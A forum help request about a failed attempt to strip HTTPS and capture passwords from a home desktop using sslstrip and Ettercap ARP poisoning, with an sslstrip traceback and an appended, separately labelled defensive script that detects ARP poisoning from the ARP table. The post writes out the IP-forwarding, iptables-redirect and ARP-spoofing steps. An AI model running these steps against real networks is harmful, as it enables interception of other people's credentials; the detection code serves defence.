Hi,
I am trying to use Ettercap -G with sslstrip to see if I can get passwords from a computer on my home network.
I am using Kali 1.0.9. I am using the NIC that is on the laptop. I have an Alfa NHA, but I have not tried it with this yet. The NIC is wlan0.
I have a router (192.168.1.1) with 2.4 and 5 GHz bands on it (2.4 is 1 and 5 is 2). Signal is bad in another part of the house, so I have an extender (192.168.1.110) which has 2.4 and 5 GHz bands also (1a and 2a).
The computer I am trying to run it on is a desktop in the other room (192.168.1.118).
These are my commands:
In terminal A:
echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -l 10000
Open another terminal:
ettercap -G
In Ettercap -G these are my settings:
I put it in promiscuous mode
I select unified sniff
I choose wlan0 (my interface)
Under host, I scan for hosts, then I choose Host List
I put my router as Target 1
I put my desktop (the one I am trying to run it on, 192.168.1.118) as Target 2
Under Manage Plugins, I choose dns_spoof
Under MITM I choose Arp poisoning
I then select sniff remote poisoning
Then I start the sniff
Nothing seems to happen in Ettercap -G, but in the sslstrip terminal I get a runtime error. I tried to open the sslstrip.log and there is nothing in it. This is the error:
root@kali:~# sslstrip -l 10000
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
  File "/usr/bin/sslstrip", line 105, in main
    reactor.run()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
    self.mainLoop()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
    self.doIteration(t)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 599, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 263, in _disconnectSelectable
    selectable.connectionLost(f)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 433, in connectionLost
    Connection.connectionLost(self, reason)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 277, in connectionLost
    protocol.connectionLost(reason)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 455, in connectionLost
    self.handleResponseEnd()
  File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 466, in handleResponseEnd
    self.handleResponse(b)
  File "/usr/share/sslstrip/sslstrip/ServerConnection.py", line 133, in handleResponse
    self.client.write(data)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 898, in write
    raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called
I have been reading tutorials and watching videos and I do exactly what they do in the videos and the tutorials, but I am having no luck.
At first I did not have the ' around the 1 on the echo command with sslstrip. I also saw that instead of port 10000, sometimes port 8080 is used. I am not sure if I should use a different one or not, or if I should remove the ' around the 1 in the echo command.
I was going to try it with my Alfa and see if it may be the NIC that is in the laptop. My Alfa shows up as wlan1 so I was going to put wlan0 down.
I also noticed when I do it, I seem to cut off the internet connection for the whole house. I think it may be the ports I am using.
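
Added example, not part of the original post: how the ARP poisoning step in the setup above shows up in the desktop's own neighbor table, and a check that flags it from Linux /proc/net/arp text. The sample table, its MAC addresses, the second host 192.168.1.105 and all function names are constructed for illustration.

```python
import re

# Constructed sample in /proc/net/arp format, as seen from the desktop
# (192.168.1.118) while its gateway entry is poisoned. MACs are made up.
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.110    0x1         0x2         66:77:88:99:aa:bb     *        eth0
192.168.1.105    0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.120    0x1         0x0         00:00:00:00:00:00     *        eth0
"""

ROW = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+0x\w+\s+(0x\w+)\s+([0-9a-fA-F:]{17})\s")

def parse_arp(text):
    """Return {ip: mac} for complete entries (ATF_COM flag bit 0x2 set)."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m and int(m.group(2), 16) & 0x2:
            table[m.group(1)] = m.group(3).lower()
    return table

def find_shared_macs(table, allow=()):
    """Return {mac: sorted ips} for MACs claimed by more than one IP."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items()
            if len(ips) > 1 and mac not in allow}

def gateway_alert(table, gateway, known_mac=None, allow=()):
    """Describe why the gateway entry looks poisoned, or return None."""
    mac = table.get(gateway)
    if mac is None:
        return None
    if known_mac and mac != known_mac.lower():
        return f"{gateway} is at {mac}, expected {known_mac.lower()}"
    others = [ip for ip in find_shared_macs(table, allow).get(mac, [])
              if ip != gateway]
    if others:
        return f"{gateway} shares MAC {mac} with {', '.join(others)}"
    return None

if __name__ == "__main__":
    print(gateway_alert(parse_arp(SAMPLE_ARP), "192.168.1.1"))
```

The `allow` parameter is there because some wireless extenders present the clients behind them under the extender's own MAC, which would otherwise show up as a shared MAC; pinning the router's real address with `known_mac` is the stronger check.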